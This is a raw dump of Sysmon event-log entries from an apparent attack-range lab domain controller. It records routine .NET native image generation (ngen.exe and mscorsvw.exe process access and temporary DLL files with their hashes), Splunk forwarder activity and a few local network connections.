21:07:21.451{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A289-60D3-FA05-00000000CF01}6532C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Micro
soft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023881Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:21.451{4DB9351A-A289-60D3-F905-00000000CF01}2796NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\DC8GKAP8KO\System.Web.Extensions.Design.ni.dll.auxMD5=2E190ABF6C926075E6BFFD9737B3FA5E,SHA256=58FFA5D88639A41F48019DB56458BC073ACF929B34342A8179BAF22819480E36,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023880Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:21.451{4DB9351A-A289-60D3-F905-00000000CF01}2796NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\DC8GKAP8KO\System.Web.Extensions.Design.ni.dllMD5=E962BF0BFF0D652F79278764B5EC481A,SHA256=DED0AC4AC3D379F75F3B2751F6A7AF4A1045D6187957EE09371C990ECD1750E0,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023879Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:21.420{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A289-60D3-F905-00000000CF01}2796C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x800000000000000023878Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:21.405{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A289-60D3-F905-00000000CF01}2796C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023877Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:21.405{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A289-60D3-F905-00000000CF01}2796C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Micro
soft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023876Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:21.405{4DB9351A-A289-60D3-F805-00000000CF01}6456NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\2IPE8MAUMM\System.Web.Extensions.ni.dll.auxMD5=C2619B2FE4599E5587D901C82A35C2B2,SHA256=4BEF9FB8C1F170E60C4CE34BFED2A00483BF90A3362DC60611F72B2B52739186,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023875Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:21.405{4DB9351A-A289-60D3-F805-00000000CF01}6456NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\2IPE8MAUMM\System.Web.Extensions.ni.dllMD5=AE8181AB955D15A62AB5ED3846B563CB,SHA256=6E835676CDBDBD3F45662D034D244F536CD627572BA58CDFF8BC722D6E8FD69D,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000023874Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:21.405{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=D6507020CB26C44DDEEF769BB292645E,SHA256=3A8C51864B2DF6C936E15F17CD1FD47B0152ACAB9DE688AC70233E75DF52302F,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000023873Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:19.209{4DB9351A-9DEA-60D3-2D00-00000000CF01}2188C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local54244- 354300x800000000000000023872Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:18.240{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program 
Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61468-false10.0.1.12-8000- 10341000x800000000000000023871Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:21.201{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A289-60D3-F805-00000000CF01}6456C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023870Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:21.186{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A289-60D3-F805-00000000CF01}6456C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023869Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:21.186{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A289-60D3-F805-00000000CF01}6456C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023868Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:21.170{4DB9351A-A289-60D3-F705-00000000CF01}1088NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\VNY2FWI5J3\System.Web.Entity.Design.ni.dll.auxMD5=3D65530D174188B5BB64FBF6CB6691E0,SHA256=36817B6937032381FE20947D816B38B057437AA88C3EEC95A8AEED71F397B1A4,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000023867Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:21.170{4DB9351A-A289-60D3-F705-00000000CF01}1088NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\VNY2FWI5J3\System.Web.Entity.Design.ni.dllMD5=DC268F5ACB57C7F29E42A1F763EFEB04,SHA256=A774DDE38E01867EA3DFB23C3364A57E4FA4AE85CF4E074682389AF3FC04CD43,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023866Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:21.155{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A289-60D3-F705-00000000CF01}1088C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000023865Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:21.155{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=273222D6152193319C5BA78028A8B1E3,SHA256=42C9CC4B07C73D2842CD6FE4B2E70C9FAE1D447234913233162245E933AACDE3,IMPHASH=00000000000000000000000000000000falsetrue 
10341000x800000000000000023864Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:21.139{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A289-60D3-F705-00000000CF01}1088C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023863Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:21.139{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A289-60D3-F705-00000000CF01}1088C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Micro
soft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023862Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:21.139{4DB9351A-A289-60D3-F605-00000000CF01}3716NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\CDMG90PHKY\System.Web.Entity.ni.dll.auxMD5=4CA4069206709CF9E86979C4688106C7,SHA256=E727FB37D9FA9FCEB637A5C38EF68F87842952CD0F8390D4C8E0724B9099BE53,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023861Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:21.139{4DB9351A-A289-60D3-F605-00000000CF01}3716NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\CDMG90PHKY\System.Web.Entity.ni.dllMD5=4A26706D629E724852EE71A44118D4A6,SHA256=C2A22A324092F58B22ACC6EECCF26446173354E7B8C5B19485F908408540861C,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023860Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:21.108{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A289-60D3-F605-00000000CF01}3716C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
soft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023934Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:23.186{4DB9351A-A28B-60D3-0306-00000000CF01}6480NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\R11SBCAKQW\System.Windows.Presentation.ni.dll.auxMD5=9FAA968F128E5C9A925CF2CD6286CB9F,SHA256=46E1B4475212AD5DED55AD82AC901CA8B7E12E2AC3BD817AC7284004F4C92972,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023933Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:23.186{4DB9351A-A28B-60D3-0306-00000000CF01}6480NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\R11SBCAKQW\System.Windows.Presentation.ni.dllMD5=7C4400FB33835C3687A4FDB28FD48E70,SHA256=2C6B1142C3FED7D3B9D64D4D54024ACAE41AD81BA13280251BD1053A009BAF62,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023932Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:23.170{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A28B-60D3-0306-00000000CF01}6480C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x800000000000000023931Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:23.155{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A28B-60D3-0306-00000000CF01}6480C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023930Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:23.155{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A28B-60D3-0306-00000000CF01}6480C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Micro
soft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023929Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:23.139{4DB9351A-A28B-60D3-0206-00000000CF01}5848NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\85EKJF2CAD\System.AddIn.ni.dll.auxMD5=EB561902CB0E4E3BC8CE557F96B06CDB,SHA256=47B4B123FA2BCB075CA884AC8841A16AF6A3319FFCDFB8AF2A8D7F4968CDF9F9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023928Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:23.139{4DB9351A-A28B-60D3-0206-00000000CF01}5848NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\85EKJF2CAD\System.AddIn.ni.dllMD5=B6D4C0EA407A66BEFE66D36F7BE2A226,SHA256=49C79E67581102B1932DD8EDB561E7BCF4F343ECBEA8CFF7EE46478769EC9397,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023927Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:23.123{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A28B-60D3-0206-00000000CF01}5848C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x800000000000000023926Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:23.109{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A28B-60D3-0206-00000000CF01}5848C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023925Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 